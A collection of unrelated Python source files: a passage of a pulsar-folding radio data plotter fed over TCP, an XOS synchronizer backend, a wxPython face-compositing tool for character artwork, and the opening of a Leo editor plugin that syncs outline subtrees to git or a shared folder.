bytes_recd = 0
while bytes_recd < length:
chunk = connection.recv(min(length - bytes_recd, 2048))
if chunk == b"":
raise RuntimeError("socket connection broken")
chunks.append(chunk)
bytes_recd = bytes_recd + len(chunk)
return b"".join(chunks)
connection, client_address = sock.accept()
packed_header = receive(connection, 48)
print(len(packed_header), packed_header)
tcp_header = struct.unpack(header_fmt, packed_header)
pkt_length = tcp_header[0] # packet_length
pkt_header = tcp_header[1] # header_length
pkt_samples = tcp_header[2] # samples_per_packet
pkt_dtype = tcp_header[3] # sample_type
pkt_raw_cad = tcp_header[4] # raw_cadence
pkt_freqs = tcp_header[5] # num_freqs
pkt_elems = tcp_header[6]  # num_elems (number of streams)
pkt_int_len = tcp_header[7] # samples_summed
pkt_idx0 = tcp_header[8] # handshake_idx
pkt_utc0 = tcp_header[9] # handshake_utc
print(tcp_header)
sec_per_pkt_frame = pkt_raw_cad * pkt_int_len
info_header = receive(connection, pkt_freqs * 4 * 2 + pkt_elems * 1)
freqlist = np.fromstring(info_header[: pkt_freqs * 4 * 2], dtype=np.float32).reshape(
-1, 2
) # .mean(axis=1)
freqlist = freqlist / 1e6
elemlist = np.fromstring(info_header[pkt_freqs * 4 * 2 :], dtype=np.int8)
plot_freqs = pkt_freqs / 8
# freqlist = freqlist.reshape(-1,plot_freqs).mean(axis=1)
plot_times = 256 * 4
plot_phase = 128
total_integration = 1024 * 8
if pkt_int_len > total_integration:
print("Pre-integrated to longer than desired time!")
print("{} vs {}".format(pkt_int_len, total_integration))
print("Resetting integration length to {}".format(pkt_int_len))
total_integration = pkt_int_len
local_integration = total_integration / pkt_int_len
waterfall = np.zeros((plot_times, plot_freqs, pkt_elems), dtype=np.float32) + np.nan
countfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32)
fold_period = 1.0 / psrdata["frequency"]
waterfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32)
times = np.zeros(plot_times)
def data_listener():
global connection, sock
global waterfall, waterfold, countfold
global times, total_integration, pkt_idx0
last_idx = pkt_idx0
data_pkt_frame_idx = 0
data_pkt_samples_summed = 1
idx = 0
while True:
try:
d = np.zeros([pkt_freqs, pkt_elems])
n = np.zeros([pkt_freqs, pkt_elems])
t = np.zeros(plot_times)
waterfold *= 0.999
countfold *= 0.999
for i in np.arange(local_integration * pkt_elems):
data = receive(connection, pkt_length + pkt_header)
if len(data) != pkt_length + pkt_header:
print("Lost Connection!")
connection.close()
return
data_pkt_frame_idx, data_pkt_elem_idx, data_pkt_samples_summed = struct.unpack(
"III", data[:pkt_header]
)
d[:, data_pkt_elem_idx] += (
np.fromstring(data[pkt_header:], dtype=np.uint32) * 1.0
)
n[:, data_pkt_elem_idx] += data_pkt_samples_summed * 1.0
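                # Fold onto the pulsar period: map this frame's timestamp (offset by half
                # a period) into one of plot_phase bins of fold_period = 1 / spin frequency.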
fold_idx = np.array(
(
(sec_per_pkt_frame * data_pkt_frame_idx + 0.5 * fold_period)
% fold_period
)
/ fold_period
* plot_phase,
dtype=np.int32,
)
waterfold[fold_idx, :, data_pkt_elem_idx] += (
np.fromstring(data[pkt_header:], dtype=np.uint32)
.reshape(-1, pkt_freqs / plot_freqs)
.mean(axis=1)
)
countfold[fold_idx, :, data_pkt_elem_idx] += data_pkt_samples_summed
roll_idx = (data_pkt_frame_idx - last_idx) / local_integration
times = np.roll(times, roll_idx)
times[0] = sec_per_pkt_frame * (data_pkt_frame_idx - pkt_idx0) + pkt_utc0
# print(d,n)
waterfall = np.roll(waterfall, roll_idx, axis=0)
waterfall[0, :, :] = 10 * np.log10(
(d / n).reshape(-1, pkt_freqs / plot_freqs, pkt_elems).mean(axis=1)
)
if np.mean(n) != total_integration:
print(np.mean(n), np.std(n))
last_idx = data_pkt_frame_idx
# except socket.error, exc:
except:
connection, client_address = sock.accept()
packed_header = receive(connection, 48)
info_header = receive(connection, pkt_freqs * 4 * 2 + pkt_elems * 1)
print("Reconnected!")
thread = threading.Thread(target=data_listener)
thread.daemon = True
thread.start()
time.sleep(1)
f, ax = plt.subplots(2, pkt_elems, gridspec_kw={"height_ratios": [2, 1]})
f.subplots_adjust(right=0.8)
if pkt_elems == 1:
ax = [ax]
plt.ioff()
p = []
tmin = md.date2num(
datetime.datetime.fromtimestamp(
pkt_utc0 - plot_times * local_integration * sec_per_pkt_frame
)
)
tmax = md.date2num(datetime.datetime.fromtimestamp(pkt_utc0))
times = pkt_utc0 - np.arange(plot_times) * local_integration * sec_per_pkt_frame
date_format = md.DateFormatter("%H:%M:%S")
medsub = True
colorscale = [-0.5, 0.5]
for i in np.arange(pkt_elems):
p.append(
ax[0, i].imshow(
waterfall[:, :, i],
aspect="auto",
animated=True,
origin="upper",
interpolation="nearest",
cmap="gray",
vmin=colorscale[0],
vmax=colorscale[1],
extent=[freqlist[0, 0], freqlist[-1, -1], tmin, tmax],
)
)
ax[0, i].set_yticklabels([])
ax[0, i].yaxis_date()
ax[0, 0].set_title(stokes_lookup[elemlist[0] + 8])
ax[0, 1].set_title(stokes_lookup[elemlist[1] + 8])
ax[0, 0].set_ylabel("Local Time")
ax[0, 0].yaxis_date()
ax[0, 0].yaxis.set_major_formatter(date_format)
for i in np.arange(pkt_elems):
p.append(
ax[1, i].imshow(
waterfold[:, :, i],
aspect="auto",
animated=True,
origin="upper",
interpolation="nearest",
cmap="gray",
vmin=colorscale[0],
vmax=colorscale[1],
extent=[freqlist[0, 0], freqlist[-1, -1], 0, 1],
)
)
ax[1, i].set_xlabel("Freq (MHz)")
ax[1, 0].set_ylabel("Pulse Phase")
cbar_ax = f.add_axes([0.85, 0.15, 0.05, 0.7])
c = f.colorbar(p[0], cax=cbar_ax)
c.set_label("Power (dB, arbitrary)")
from matplotlib.widgets import Slider, Button
rax = plt.axes([0.82, 0.03, 0.15, 0.04])
check = Button(rax, "Med Subtract")
def func(event):
global medsub, check, colorscale
medsub = not medsub
if medsub:
check.label.set_text("Med Subtracted")
colorscale = [-0.5, 0.5]
else:
check.label.set_text("Raw Power")
colorscale = [-10, 10]
check.on_clicked(func)
ani = animation.FuncAnimation(f, updatefig, frames=100, interval=100)
f.show()
|
backend_modelpolicy.py
|
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import inspect
import imp
import sys
import threading
import time
from syncstep import SyncStep
from synchronizers.new_base.event_loop import XOSObserver
from xosconfig import Config
from multistructlog import create_logger
log = create_logger(Config().get("logging"))
class Backend:
def run(self):
# start model policies thread
        policies_dir = Config().get("model_policies_dir")
if policies_dir:
from synchronizers.model_policy import run_policy
model_policy_thread = threading.Thread(target=run_policy)
model_policy_thread.start()
else:
model_policy_thread = None
log.info("Skipping model policies thread due to no model_policies dir.")
while True:
try:
time.sleep(1000)
except KeyboardInterrupt:
print("exiting due to keyboard interrupt")
if model_policy_thread:
model_policy_thread._Thread__stop()
sys.exit(1)
|
face_match_frame.py
|
import os
import re
from threading import Thread
import numpy
import wx
from PIL import Image, ImageChops
from core.src.static_classes.image_deal import ImageWork
from core.src.structs_classes.drop_order import FaceDragOrder
from core.src.structs_classes.extract_structs import PerInfo
from core.src.thread_classes.quick_view import QuickRestore
from .design_frame import MyDialogAddFace
class FaceMatchFrame(MyDialogAddFace):
def __init__(self, parent, target: PerInfo):
super(FaceMatchFrame, self).__init__(parent)
        # Target character and the imported face images
self.target = target
self.input_values = {}
# self.face_file_group = {}
self.view_list = []
self.is_all_only = True
        # Restore the target's full-body paint
self.target_img = ImageWork.az_paint_restore(target.mesh_path, target.tex_path,
not target.get_is_able_work() and target.must_able)
self.target_size = self.target_img.size
        # Target face image
self.target_face = Image.Image()
        # Size of the main image display area
self.main_view_w, self.main_view_h = list(self.m_bitmap_main_view.GetSize())
        # Background canvas
self._bg_size = self.target_size
self.bg_paint = Image.new("RGBA", self.bg_size, (0, 0, 0, 255))
        # Position of the paint on the background canvas
self.target_paint_x = 0
self.target_paint_y = 0
        # Background canvas size extensions
self._top_extend = 0
self._left_extend = 0
self._right_extend = 0
self._button_extend = 0
        # Face coordinates
self._pos_x = 0
self._pos_y = 0
        # Coordinates relative to the display area
self.pos_x_a = 0
self.pos_y_a = 0
        # Top-left coordinates of the visible canvas region
self._target_x = 0
self._target_y = 0
        # Face selection state
self.select_index = -1
self.select_count = 0
        # Face import (drag-and-drop)
self.drop_order = FaceDragOrder(self, self.callback)
self.m_listBox_import_face.SetDropTarget(self.drop_order)
        # Preview generator
self.view_work = ...
        # Step size
self.step = 1
self.save_path = ""
self.is_alpha_paste = False
self.m_bitmap_main_view.SetDoubleBuffered(True)
@staticmethod
def paste_face(target: Image.Image, face: Image.Image, pos: tuple):
"""
        Alpha-blend a face image onto the background
        :param target: background image to blend onto
        :param face: face image to blend in
        :param pos: position at which the face is drawn
        :return: None
"""
target_bg = target.crop([pos[0], pos[1], pos[0] + face.width, pos[1] + face.height])
alpha = face.getchannel("A")
        # Alpha handling
alpha_f = alpha
alpha_g = target_bg.getchannel("A")
a_f = ImageChops.lighter(alpha_f, alpha_g)
        al = numpy.array(alpha, dtype=float)
scale = al / 255
face_a = numpy.array(face)
bg_a = numpy.array(target_bg)
alpha_data = numpy.array(a_f)
bg_a[:, :, 2] = bg_a[:, :, 2] * (1 - scale)
bg_a[:, :, 1] = bg_a[:, :, 1] * (1 - scale)
bg_a[:, :, 0] = bg_a[:, :, 0] * (1 - scale)
face_a[:, :, 0] = face_a[:, :, 0] * scale
face_a[:, :, 1] = face_a[:, :, 1] * scale
face_a[:, :, 2] = face_a[:, :, 2] * scale
f_target = bg_a + face_a
f_target[:, :, 3] = alpha_data
face_e = Image.fromarray(f_target)
target.paste(face_e, pos)
    # Background extension handling
@property
def bg_size(self):
return self._bg_size
@bg_size.setter
def bg_size(self, value):
if len(value) == 2:
            # Update the background canvas size, then redraw the background and face images
self._bg_size = value
print(value)
self.paste_target_face()
    # Face-swap coordinate handling
@property
def pos_x(self):
return self._pos_x
@property
def pos_y(self):
return self._pos_y
@pos_x.setter
def pos_x(self, value):
        # Force conversion to int
value = int(value)
        # If the face's x coordinate is negative, extend the canvas left by that many pixels and reset x to 0
if value < 0:
self.left_extend += -value
value = 0
self.m_staticText_info.SetLabel(f"画布向左扩展{self.left_extend}像素")
        # If x plus the face width exceeds the current canvas width, extend the canvas to the right; x stays unchanged
elif value + self.target_face.width - self.bg_size[0] > 0:
self.right_extend += (value + self.target_face.width) - self.bg_size[0]
self.m_staticText_info.SetLabel(f"画布向右扩展{self.right_extend}像素")
# elif self.left_extend > 0 or self.right_extend > 0:
        #     # In other cases the canvas may shrink back
# if self.left_extend > 0 and self.left_extend >= value:
        #         # When the left extension is > 0, x is also > 0 and left_extend - x >= 0,
        #         # shrink the left extension by the current x value and reset x to 0
# self.left_extend -= value
# value = 0
# self.m_staticText_info.SetLabel(f"画布向左扩展{self.left_extend}像素")
#
# elif self.right_extend > 0 and \
# self.bg_size[0] > (value + self.target_face.width) >= self.bg_size[0] - self.right_extend:
        #         # When the right extension is > 0, x + face width is less than the total canvas
        #         # width and at least (canvas width - right extension); x stays unchanged and the
        #         # right extension shrinks by canvas width - (x + face width)
# self.right_extend -= self.bg_size[0] - (value + self.target_face.width)
# self.m_staticText_info.SetLabel(f"画布向右扩展{self.right_extend}像素")
self._pos_x = value
self.add_face()
@pos_y.setter
def pos_y(self, value):
        # Force conversion to int
value = int(value)
        # If the face's y coordinate is negative, extend the canvas upward by that many pixels and reset y to 0
if value < 0:
self.top_extend += -value
value = 0
self.m_staticText_info.SetLabel(f"画布向上扩展{self.top_extend}像素")
        # If y plus the face height exceeds the current canvas height, extend the canvas downward; y stays unchanged
elif value + self.target_face.height - self.bg_size[1] > 0:
self.button_extend = value + self.target_face.height - self.bg_size[1]
self.m_staticText_info.SetLabel(f"画布向下扩展{self.button_extend}像素")
# elif self.top_extend > 0 or self.button_extend > 0:
        #     # In other cases the canvas may shrink back
# if self.top_extend > 0:
        #         # When the top extension is > 0, y is also > 0 and top_extend - y >= 0,
        #         # shrink the top extension by the current y value and reset y to 0
# if self.top_extend >= value:
# self.top_extend -= value
# else:
# self.top_extend = 0
# value = 0
# self.m_staticText_info.SetLabel(f"画布向上扩展{self.top_extend}像素")
#
# elif self.button_extend > 0:
        #         # When the bottom extension is > 0, y + face height is less than the total canvas
        #         # height and at least (canvas height - bottom extension); y stays unchanged and the
        #         # bottom extension shrinks by canvas height - (y + face height)
# if self.bg_size[1] > (value + self.target_face.height) > self.bg_size[1] - self.button_extend:
# self.button_extend -= self.bg_size[1] - (value + self.target_face.height)
# elif(value + self.target_face.height)<= self.bg_size[1] - self.button_extend:
# self.button_extend = 0
# self.m_staticText_info.SetLabel(f"画布向下扩展{self.button_extend}像素")
self._pos_y = value
self.add_face()
    # Canvas coordinate handling
@property
def target_x(self):
return str(self._target_x)
@target_x.setter
def target_x(self, value):
if value < 0:
value = 0
if value + self.main_view_w > self.bg_size[0]:
value = self.bg_size[0] - self.main_view_w
self._target_x = value
# self.pos_x += value - self.main_view_w
self.paint_move(self._target_x, self._target_y)
@property
def target_y(self):
return str(self._target_y)
@target_y.setter
def target_y(self, value):
if value < 0:
value = 0
if value + self.main_view_h > self.bg_size[1]:
value = self.bg_size[1] - self.main_view_h
self._target_y = value
# self.pos_y += value - self.main_view_h
self.paint_move(self._target_x, self._target_y)
# Canvas extension handling
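# A note on the geometry (inferred from the setters below, not from the original
# comments): the canvas is kept so that
#   bg_size == (target_size[0] + left_extend + right_extend,
#               target_size[1] + top_extend + button_extend)
# and target_paint_x / target_paint_y equal left_extend / top_extend, so the
# original background image keeps its position while the canvas grows around it.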
@property
def top_extend(self):
return self._top_extend
@property
def left_extend(self):
return self._left_extend
@property
def right_extend(self):
return self._right_extend
@property
def button_extend(self):
return self._button_extend
@top_extend.setter
def top_extend(self, value):
self.target_paint_y = value
self.bg_size = (self.target_size[0] + self.left_extend + self.right_extend,
self.target_size[1] + value + self.button_extend)
self._top_extend = value
@left_extend.setter
def left_extend(self, value):
self.target_paint_x = value
self.bg_size = (self.target_size[0] + value + self.right_extend, self.target_size[1] +
self.top_extend + self.button_extend)
self._left_extend = value
@right_extend.setter
def right_extend(self, value):
self.bg_size = (self.target_size[0] + value + self.left_extend, self.target_size[1] +
self.top_extend + self.button_extend)
self._right_extend = value
@button_extend.setter
def button_extend(self, value):
self.bg_size = (self.target_size[0] + self.left_extend + self.right_extend,
self.target_size[1] + value + self.top_extend)
self._button_extend = value
def callback(self, values, is_all_only):
self.input_values = values
self.view_list = list(values.keys())
self.m_listBox_import_face.Clear()
self.m_listBox_import_face.Set(self.view_list)
self.is_all_only = is_all_only
if self.view_list:
self.m_panel7.Enable(True)
# for key in values.keys():
# value = values[key]
# temp = []
# for each in value:
# if os.path.isfile(each):
# pic = Image.open(each)
# temp.append(pic)
# self.face_file_group[key] = temp
def paste_target_face(self):
self.bg_paint = Image.new("RGBA", self.bg_size, (0, 0, 0, 0))
self.bg_paint.paste(self.target_img, (self.target_paint_x, self.target_paint_y))
if self.is_alpha_paste:
FaceMatchFrame.paste_face(self.bg_paint, self.target_face, (self.pos_x, self.pos_y))
else:
self.bg_paint.paste(self.target_face, (self.pos_x, self.pos_y), 0)
def paint_move(self, target_x, target_y):
pic = self.bg_paint.crop((target_x, target_y, self.main_view_w + target_x, self.main_view_h + target_y))
temp = wx.Bitmap.FromBufferRGBA(pic.width, pic.height, pic.tobytes())
self.m_bitmap_main_view.ClearBackground()
self.m_bitmap_main_view.SetBitmap(temp)
def add_face(self):
self.paste_target_face()
self.paint_move(self._target_x, self._target_y)
def export_all(self):
bg_size = self.bg_size
pos = (self.pos_x, self.pos_y)
target_pos = (self.target_paint_x, self.target_paint_y)
face_size = self.target_face.size
save_path = self.save_path
name = self.target.cn_name
target_img = self.target_img
os.makedirs(save_path, exist_ok=True)
for key, values in self.input_values.items():
count = 0
for value in values:
count += 1
temp = Image.open(value)
if temp.size == face_size:
pic = Image.new("RGBA", bg_size, 0)
pic.paste(target_img, target_pos, 0)
if self.is_alpha_paste:
FaceMatchFrame.paste_face(pic, temp, pos)
else:
pic.paste(temp, pos, 0)
path = os.path.join(save_path, f"{name}-{key}-{count}.png")
self.m_staticText_info.SetLabel(f"正在接头:{name}-{key}-{count}")
pic.save(path)
else:
continue
self.m_staticText_info.SetLabel(f"接头完成")
def initial(self, event):
self.bg_paint.paste(self.target_img, (0, 0))
self.paint_move(0, 0)
self.m_panel7.Enable(False)
def change_method(self, event):
self.is_alpha_paste = bool(event.GetSelection())
self.add_face()
def select_face(self, event):
index = event.GetSelection()
values = self.input_values[self.view_list[index]]
if index == self.select_index:
if self.select_count < len(values) - 1:
self.select_count += 1
else:
self.select_count = 0
else:
self.select_index = index
self.select_count = 0
guid = values[self.select_count]
temp = PerInfo(f"{self.view_list[index]}-{self.select_count}",
f"{self.view_list[index]}-{self.select_count}",
False)
temp.tex_path = guid
self.view_work = QuickRestore(temp, None,
size=tuple(self.m_panel_face.GetSize()),
bitmap_show=self.m_bitmap_face,
info_show=self.m_staticText_info)
self.view_work.start()
self.m_notebook_info.SetSelection(2)
self.target_face = Image.open(guid)
self.add_face()
@staticmethod
def value_check(event):
"""
:param event:
:return: (is_ok, cleaned) - is_ok is True if the input is already a clean integer string, cleaned is the digits/minus-only text
"""
value = event.GetString()
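# Illustrative behaviour (worked examples, not from the original source):
#   event text "25"  -> re.sub leaves "25"    -> returns (True, "25")
#   event text "12a" -> re.sub strips to "12" -> returns (False, "12")
#   event text "a"   -> re.sub strips to ""   -> returns (False, "")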
temp = re.sub(r'[^0-9\-]', "", value)
# NOTE: str.replace() returns a new string, so the two calls below are no-ops
# as written; the re.sub() above already strips everything except digits and '-'.
temp.replace(".", "")
temp.replace("-", "-0")
# temp = re.sub(r'^-', "", temp)
# temp = re.sub(r'\.\d+$', "", temp)
if temp != value or temp == "":
return False, temp
else:
return True, temp
def value_check_x(self, event):
is_ok, value = self.value_check(event)
self.pos_x = value
if not is_ok:
# self.m_textCtrl_x_value.Clear()
self.m_textCtrl_x_value.SetLabel(str(self.pos_x))
else:
pass
def value_check_y(self, event):
is_ok, value = self.value_check(event)
self.pos_y = value
if not is_ok:
# self.m_textCtrl_y_value.Clear()
self.m_textCtrl_y_value.SetLabel(str(self.pos_y))
else:
pass
def value_check_px(self, event):
is_ok, value = self.value_check(event)
self.target_x = int(value)
if not is_ok or value != self.target_x:
# self.m_textCtrl_pic_x.Clear()
self.m_textCtrl_pic_x.SetLabel(self.target_x)
else:
pass
def value_check_py(self, event):
is_ok, value = self.value_check(event)
self.target_y = int(value)
if not is_ok or value != self.target_y:
# self.m_textCtrl_pic_y.Clear()
self.m_textCtrl_pic_y.SetLabel(self.target_y)
else:
pass
def wheel_x(self, event):
angle = event.GetWheelRotation()
guide = -angle // abs(angle)
self.pos_x = self.pos_x + guide * self.step
self.m_textCtrl_x_value.SetLabel(str(self.pos_x))
def y_wheel(self, event):
angle = event.GetWheelRotation()
guide = -angle // abs(angle)
self.pos_y = self.pos_y + guide * self.step
self.m_textCtrl_y_value.SetLabel(str(self.pos_y))
def px_wheel(self, event):
angle = event.GetWheelRotation()
guide = -angle // abs(angle)
self.target_x = self._target_x + guide * self.step
self.m_textCtrl_pic_x.SetLabel(self.target_x)
def py_wheel(self, event):
angle = event.GetWheelRotation()
guide = -angle // abs(angle)
self.target_y = self._target_y + guide * self.step
self.m_textCtrl_pic_y.SetLabel(self.target_y)
def set_step(self, event):
value = event.GetString()
self.step = int(value)
def on_erase(self, event):
pass
def export(self, event):
dialog = wx.SingleChoiceDialog(self, "选择导出类型", "选择导出类型", ("仅导出当前表情组合", "导出全部相同尺寸表情组合"))
if dialog.ShowModal() == wx.ID_OK:
select = dialog.GetSelection()
# If exporting at the minimal bounding size
if self.m_checkBox_minosity_size.GetValue():
begin_x = min(self.target_paint_x, self.pos_x)
begin_y = min(self.target_paint_y, self.pos_y)
end_x = max(self.target_paint_x + self.target_size[0], self.pos_x + self.target_face.width)
end_y = max(self.target_paint_y + self.target_size[1], self.pos_y + self.target_face.height)
face_x_change = self.pos_x - begin_x
face_y_change = self.pos_y - begin_y
target_x_change = self.target_paint_x - begin_x
target_y_change = self.target_paint_y - begin_y
self.pos_x = face_x_change
self.pos_y = face_y_change
self.target_paint_x = target_x_change
self.target_paint_y = target_y_change
self.bg_size = (end_x - begin_x, end_y - begin_y)
self.m_staticText_info.SetLabel(f"尺寸修改为:{self.bg_size}")
if select == 0:
dialog = wx.FileDialog(self, f"导出{self.target.cn_name}-{self.select_index}表情组合", "./",
f"{self.target.cn_name}-{self.select_index}.png", wildcard="*.png",
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if dialog.ShowModal() == wx.ID_OK:
path = dialog.GetPath()
self.bg_paint.save(path)
else:
dialog = wx.DirDialog(self, "导出文件夹", "./",
wx.DD_NEW_DIR_BUTTON | wx.DD_CHANGE_DIR | wx.DD_DEFAULT_STYLE)
if dialog.ShowModal() == wx.ID_OK:
self.save_path = dialog.GetPath()
thread = Thread(target=self.export_all)
thread.start()
|
leo_cloud.py
|
"""
leo_cloud.py - synchronize Leo subtrees with remote central server
Terry N. Brown, terrynbrown@gmail.com, Fri Sep 22 10:34:10 2017
This plugin allows subtrees within a .leo file to be stored in the cloud. It
should be possible to support various cloud platforms; currently git and systems
like DropBox are supported (i.e. you can use GitLab or GitHub or your own remote
git server).
A leo_cloud subtree has a top node with a headline that starts with
'@leo_cloud'. The rest of the headline is ignored. The body of this top node is
used to describe the cloud service, e.g.:
type: Git
remote: git@gitlab.com:tnbrown/leo_cloud_storage.git
local: ~/.leo/leo_cloud/gitlab_leo_cloud_storage
ID: shortcuts
read_on_load: ask
write_on_save: ask
The first three lines can be repeated with different IDs to store
different subtrees at the same remote cloud location.
read_on_load: / write_on_save: can be yes, no, ask, or background (read_on_load
only). If it's not one of those values, there's a warning dialog. `background`
performs a check against the cloud in the background, and then behaves like
`ask` if a difference is detected.
There's also a file system backend, which would look like this:
type: FileSystem
root: ~/DropBox/leo_cloud
ID: my_notes
read_on_load: ask
write_on_save: ask
If you point the FileSystem backend at a folder that is synced externally, as
shown above, it can serve as a cloud adapter for services like DropBox, Google
Drive, OneDrive, etc.
In addition to the Git and FileSystem cloud types it should be possible to add
many others - AWS, WebDAV, sFTP, whatever.
FYI: https://gitlab.com/ gives you free private repos.
The plugin stores headline, body, and uA (unknown attributes). The caveat is
that it must be JSON serializable; this is to avoid pickle flavor issues. I
don't think this will cause problems except for legacy datetime objects from the
todo.py plugin and set()s in the tags plugin. I think both can be fixed easily -
a custom JSON writer can write datetime as iso string time and sets as lists,
and the tags plugin can coerce lists to sets. I think the todo.py plugin already
reads iso string time values.
My intended use was a common synchronized todo list across machines, which this
achieves.
An unintended bonus is that you can use it to sync. your settings across
machines easily too. Like this:
@settings
@keys
@leo_cloud
@shortcuts
"just works", so now your shortcuts etc. can be stored on a central
server.
"""
# pylint: disable=unused-import
import json
import os
import re
import shlex
import subprocess
import threading
from copy import deepcopy
from datetime import date, datetime
from hashlib import sha1
import leo.core.leoGlobals as g
from leo.core.leoNodes import vnode
from leo.core.leoQt import QtCore # see QTimer in LeoCloud.__init__
# for 'key: value' lines in body text
KWARG_RE = re.compile(r"^([A-Za-z][A-Za-z0-9_]*): (.*)")
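# e.g. (illustrative) KWARG_RE.match('type: Git').groups() == ('type', 'Git'),
# while indented or '#'-prefixed lines don't match, so kw_from_node() below only
# picks up top-level 'key: value' settings.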
def init ():
g.registerHandler(('new','open2'), onCreate)
g.registerHandler(('save1'), onSave)
g.plugin_signon(__name__)
return True
def onCreate (tag, keys):
c = keys.get('c')
if not c:
return
c._leo_cloud = LeoCloud(c)
def onSave(tag, keys):
c = keys.get('c')
if not c:
return
if getattr(c, '_leo_cloud', None):
c._leo_cloud.save_clouds()
return None # explicitly not stopping save1 hook
@g.command("lc-read-current")
def lc_read_current(event):
"""read current Leo Cloud subtree from cloud"""
c = event.get('c')
if not c or not hasattr(c, '_leo_cloud'):
return
c._leo_cloud.read_current()
@g.command("lc-write-current")
def lc_write_current(event):
"""write current Leo Cloud subtree to cloud"""
c = event.get('c')
if not c or not hasattr(c, '_leo_cloud'):
return
c._leo_cloud.write_current()
class LeoCloudIOBase:
"""Leo Cloud IO layer Base Class
LeoCloudIO layer sits between LeoCloud plugin and backends,
which might be leo_cloud_server.py or Google Drive etc. etc.
"""
def __init__(self, c, p, kwargs):
"""
:param context c: Leo outline
:param position p: @leo_cloud position
:param dict kwargs: key word args from p.b
"""
self.v = p.v
self.c = c
self.lc_id = kwargs['ID']
def get_subtree(self, lc_id):
"""get_subtree - get a Leo subtree from the cloud
:param str(?) lc_id: resource to get
:returns: vnode build from lc_id
"""
# pylint: disable=no-member
# self.get_data
return self.c._leo_cloud.from_dict(self.get_data(lc_id))
def put_subtree(self, lc_id, v):
"""put - put a subtree into the Leo Cloud
:param str(?) lc_id: place to put it
:param vnode v: subtree to put
"""
# pylint: disable=no-member
# self.put_data
self.put_data(lc_id, LeoCloud.to_dict(v))
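# Note (summarising the subclasses below, not part of the original comments):
# a concrete backend only has to provide get_data(lc_id) -> obj and
# put_data(lc_id, data); get_subtree()/put_subtree() handle the vnode <-> dict
# conversion via LeoCloud.from_dict() / LeoCloud.to_dict().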
class LeoCloudIOFileSystem(LeoCloudIOBase):
"""Leo Cloud IO layer that just loads / saves local files.
i.e. it's just for development / testing
"""
def __init__(self, c, p, kwargs):
"""
:param context c: Leo outline
:param position p: @leo_cloud position
:param dict kwargs: keyword args from p.b; 'root' is the folder for data
"""
LeoCloudIOBase.__init__(self, c, p, kwargs)
self.basepath = kwargs['root']
if not os.path.exists(self.basepath):
os.makedirs((self.basepath))
def get_data(self, lc_id):
"""get_data - get a Leo Cloud resource
:param str(?) lc_id: resource to get
:returns: object loaded from JSON
"""
filepath = os.path.join(self.basepath, lc_id+'.json')
with open(filepath) as data:
return json.load(data)
def put_data(self, lc_id, data):
"""put - store data in the Leo Cloud
:param str(?) lc_id: place to put it
:param obj data: data to store
"""
filepath = os.path.join(self.basepath, lc_id+'.json')
with open(filepath, 'w') as out:
return out.write(LeoCloud.to_json(data))
class LeoCloudIOGit(LeoCloudIOBase):
"""Leo Cloud IO layer that just loads / saves local files.
i.e it's just for development / testing
"""
def __init__(self, c, p, kwargs):
"""
:param context c: Leo outline
:param position p: @leo_cloud position
:param dict kwargs: keyword args from p.b; 'remote' is the git URL, 'local' the local clone path
"""
# if p.v._leo_cloud_io was used, we'd probably also need to pull
# in get_data(), so don't bother with p.v._leo_cloud_io
# p.v._leo_cloud_io = self
LeoCloudIOBase.__init__(self, c, p, kwargs)
self.remote = kwargs['remote']
self.local = os.path.expanduser(kwargs['local'])
if not os.path.exists(self.local):
os.makedirs((self.local))
if not os.listdir(self.local):
self._run_git('git clone "%s" "%s"'% (self.remote, self.local))
self._run_git('git -C "%s" pull' % self.local)
def _run_git(self, text):
"""_run_git - run a git command
:param str text: command to run
"""
subprocess.Popen(shlex.split(text)).wait()
def get_data(self, lc_id):
"""get_data - get a Leo Cloud resource
:param str(?) lc_id: resource to get
:returns: object loaded from JSON
"""
filepath = os.path.join(self.local, lc_id+'.json')
with open(filepath) as data:
return json.load(data)
def put_data(self, lc_id, data):
"""put - store data in the Leo Cloud
:param str(?) lc_id: place to put it
:param obj data: data to store
"""
filepath = os.path.join(self.local, lc_id+'.json')
with open(filepath, 'w') as out:
out.write(LeoCloud.to_json(data))
self._run_git('git -C "%s" add "%s"' % (self.local, lc_id+'.json'))
self._run_git('git -C "%s" commit -mupdates' % self.local)
self._run_git('git -C "%s" push' % self.local)
class LeoCloud:
def __init__(self, c):
"""
:param context c: Leo context
"""
self.c = c
self.bg_finished = False # used for background thread
self.bg_results = [] # results from background thread
# we're here via open2 hook, but too soon to load from cloud,
# so defer
QtCore.QTimer.singleShot(0, self.load_clouds)
def bg_check(self, to_check):
"""
bg_check - run from load_clouds() to look for changes in
cloud in background.
WARNING: no gui impacting calls allowed here (g.es() etc.)
:param list to_check: list of (vnode, kwargs, hash) tuples to check
This (background) thread can't handle any changes found, because it
would have to interact with the user and GUI code can only be called
from the main thread. We don't want to use QThread, to allow this to
work without Qt. So we just collect results and set
self.bg_finished = True, which the main thread watches using g.IdleTime()
"""
for v, kwargs, local_hash in to_check:
c = v.context
p = c.vnode2position(v)
lc_io = getattr(v, '_leo_cloud_io', None) or self.io_from_node(p)
subtree = lc_io.get_subtree(lc_io.lc_id)
remote_hash = self.recursive_hash(subtree, [], include_current=False)
self.bg_results.append((v, local_hash == remote_hash))
self.bg_finished = True
def bg_post_process(self, timer):
"""
bg_post_process - check to see if background checking is finished,
handle any changed cloud trees found
:param leo-idle-timer timer: Leo idle timer
"""
if not self.bg_finished:
return
timer.stop()
from_background = set()
for v, unchanged in self.bg_results:
kwargs = self.kw_from_node(v)
if unchanged:
g.es("Cloud tree '%s' unchanged" % kwargs['ID'])
else:
from_background.add((kwargs['remote'], kwargs['ID']))
g.es("Cloud tree '%s' DOES NOT MATCH" % kwargs['ID'])
if from_background:
self.load_clouds(from_background=from_background)
def find_at_leo_cloud(self, p):
"""find_at_leo_cloud - find @leo_cloud node
:param position p: start from here, work up
:return: position or None
"""
while not p.h.startswith("@leo_cloud") and p.parent():
p = p.parent()
if not p.h.startswith("@leo_cloud"):
g.es("No @leo_cloud node found", color='red')
return
return p
